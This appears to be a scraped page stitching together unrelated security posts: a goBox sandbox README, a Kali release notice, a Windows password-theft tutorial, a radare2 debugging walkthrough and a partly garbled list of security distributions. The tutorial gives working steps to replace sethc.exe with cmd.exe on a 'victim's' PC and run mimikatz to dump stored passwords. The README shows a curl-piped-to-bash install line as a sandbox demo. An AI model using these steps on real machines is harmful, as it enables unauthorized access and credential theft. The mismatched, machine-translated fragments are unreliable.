goBox - GO Sandbox To Run Untrusted Code


GO sandbox to run untrusted code.
goBox uses Ptrace to hook into READ syscalls, giving you the option to accept or deny syscalls before they are executed.

Usage
Usage of ./gobox:

gobox [FLAGS] command

flags:
-h Print Usage.
-n value
A glob pattern for automatically blocking file reads.
-y value
A glob pattern for automatically allowing file reads.

Use cases

You want to install anything
> gobox -n "/etc/password.txt" npm install sketchy-module

BLOCKED READ on /etc/password.txt
> gobox -n "/etc/password.txt" bash <(curl  https://danger.zone/install.sh)

BLOCKED READ on /etc/password.txt

You are interested in what file reads you favourite program makes.
Sure you could use strace, but it references file descriptors goBox makes the this much easier at a glance by printing the absolute path of the fd.
> gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]
NOTE: It's definitely a better idea to encrypt all your sensitive data, goBox should probably only be used when that is inconvenient or impractical.
NOTE: I haven't made any effort for cross-x compatibility so it currently only works on linux. I'd happily accept patches to improve portability.

Kali Linux 2018.3 Release - Penetration Testing And Ethical Hacking Linux Distribution



Kali 2018.3 brings the kernel up to version 4.17.0 and while 4.17.0 did not introduce many changes, 4.16.0 had a huge number of additions and improvements including more Spectre and Meltdown fixes, improved power management, and better GPU support.

New Tools and Tool Upgrades

Since our last release, we have added a number of new tools to the repositories, including:
  • idb – An iOS research / penetration testing tool
  • gdb-peda – Python Exploit Development Assistance for GDB
  • datasploit – OSINT Framework to perform various recon techniques
  • kerberoast – Kerberos assessment tools

In addition to these new packages, we have also upgraded a number of tools in our repos including aircrack-ng, burpsuite, openvas,wifite, and wpscan.

Download Kali Linux 2018.3


If you would like to check out this latest and greatest Kali release, you can find download links for ISOs and Torrents on the Kali Downloads page along with links to the Offensive Security virtual machine and ARM images, which have also been updated to 2018.3. If you already have a Kali installation you're happy with, you can easily upgrade in place as follows.

Making sure you are up-to-date


To double check your version, first make sure your network repositories is enabled.
root@kali:~# cat</etc/apt/sources.list

Then after running apt -y full-upgrade, you may require a reboot before checking:

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Vlang Binary Debugging

Why vlang? V is a featured, productive, safe and confortable language highly compatible with c, that generates neat binaries with c-speed, the decompilation also seems quite clear as c code.

After open the binary with radare in debug mode "-d" we proceed to do the binary recursive analysis with "aaaa" the more a's the more deep analys.



The function names are modified when the binary is crafted, if we have a function named hello in a module named main we will have the symbol main__hello, but we can locate them quicly thanks to radare's grep done with "~" token in this case applied to the "afl" command which lists all the symbols.


Being in debug mode we can use "d*" commands, for example "db" for breakpointing the function and then "dc" to start or continue execution.


Let's dissasemble the function with "pD" command, it also displays the function variables and arguments as well, note also the xref "call xref from main"


Let's take a look to the function arguments, radare detect's this three 64bits registers used on the function.


Actually the function parameter is rsi that contains a testing html to test the href extraction algorithm.


The string structure is quite simple and it's plenty of implemented methods.




With F8 we can step over the code as we were in ollydbg on linux.


Note the rip marker sliding into the code.


We can recognize the aray creations, and the s.index_after() function used to find substrings since a specific position.


If we take a look de dissasembly we sill see quite a few calls to tos3() functions.
Those functions are involved in string initialization, and implements safety checks.

  • tos(string, len)
  • tos2(byteptr)
  • tos3(charptr)

In this case I have a crash in my V code and I want to know what is crashing, just continue the execution with "dc" and see what poits the rip register.



In visual mode "V" we can see previous instructions to figure out the arguments and state.


We've located the crash on the substring operation which is something like "s2 := s1[a..b]" probably one of the arguments of the substring is out of bounds but luckily the V language has safety checks and is a controlled termination:



Switching the basic block view "space" we can see the execution flow, in this case we know the loops and branches because we have the code but this view also we can see the tos3 parameter "href=" which is useful to locate the position on the code.



When it reach the substr, we can see the parameters with "tab" command.



Looking the implementation the radare parameter calculation is quite exact.


Let's check the param values:


so the indexes are from 0x0e to 0x24 which are inside the buffer, lets continue to next iteration,
if we set a breakpoint and check every iteration, on latest iteration before the crash we have the values 0x2c to 0x70 with overflows the buffer and produces a controlled termination of the v compiled process.

3. Parrot Security OS

Parrot Security OS is a GNU / Linux distribution based on Debian. Fue built in order to perform penetration tests (safety information), vulnerability assessment and mitigation, Computer Forensics and Anonymous Surfing. Ha been developed by the team of Frozen box.
Parrot is based on the stable branch (Jessie) of Debian, a Linux 4.1 kernel hardened customized with a branch grsecurity patched available. The desktop environment is MATE fork of Gnome 2, and the default display manager is LightDM. The project is certified to run on machines with 265MB of RAM minimum follow and it is suitable for both 32-bit (i386) and 64-bit (amd64), with a special edition that works on 32-bit machines of age (486). Moreover, the project is available for Armel and armhf architectures. It even offers an edition (both 32 bit and 64 bit) developed for servers only for pen testing cloud.

4. Live Hacking OS

Live Hacking OS is a Linux distribution packed with tools and utilities for ethical hacking, penetration testing, and countermeasure verification. It includes embedded GUI GNOME user. There is a second variation available which has only the command line and requires much fewer hardware requirements.

5. DEFT Linux

DEFT stands for Digital Evidence and Forensic Toolkit and it is a distribution of Linux open source software built around the DART (Toolkit for Advanced Response Digital) and is based on the Ubuntu operating system. It has been designed from scratch to offer some of the best computer forensics open source and incident response tools that can be used by individuals, IT auditors, investigators, military, and police.

6. Samurai Web Testing Framework

The Samurai Web Testing Framework is a live Linux environment which has been pre-configured to function as a web pen-testing environment. The CD contains the best of open source and free tools that focus on testing and websites that attack. In the development of this environment, it is based on our selection of tools that we use in our practice of security. Hence, it includes the tools that were used in the four steps of a pen-test web.

7. Network Security Toolkit

The Network Security Toolkit (NST) is a Live CD based on Linux that provides a set of security tools computing and open source network to carry out routine security tasks and diagnostic networks and tracing. The distribution can be used as an analysis of network security, validation and monitoring tool for servers hosting virtual machines. NST has management capabilities similar to Fedora packages and maintains its own repository of additional packages.

8. Bugtraq

Bugtraq is a mailing list dedicated to safety issues in computers. On-topic issues new discussions about vulnerabilities, security-related notices providers, operating methods, and how to fix them. This is a mailing list of large volume, and almost all new vulnerabilities are there. NodeZero is an open source system based on the operating core derived from the most popular Linux distribution in the world, Ubuntu, and designed to be used for penetration testing operations. The distribution can be downloaded as an ISO image live DVD, which will also take place on computers that support both 32-bit (x86) and 64-bit (x86_64) instruction set. Besides the fact that it allows you to start the live system, start menu contains several advanced features such as the ability to perform a diagnostic test of system memory, boot from local disk options, start the installer directly and to start in safe graphics mode, text mode or in debug mode.
Default graphical desktop environment NodeZero is powered by GNOME, which uses the classic GNOME interface. It has a design of two panels and uses the default software repositories of Ubuntu.
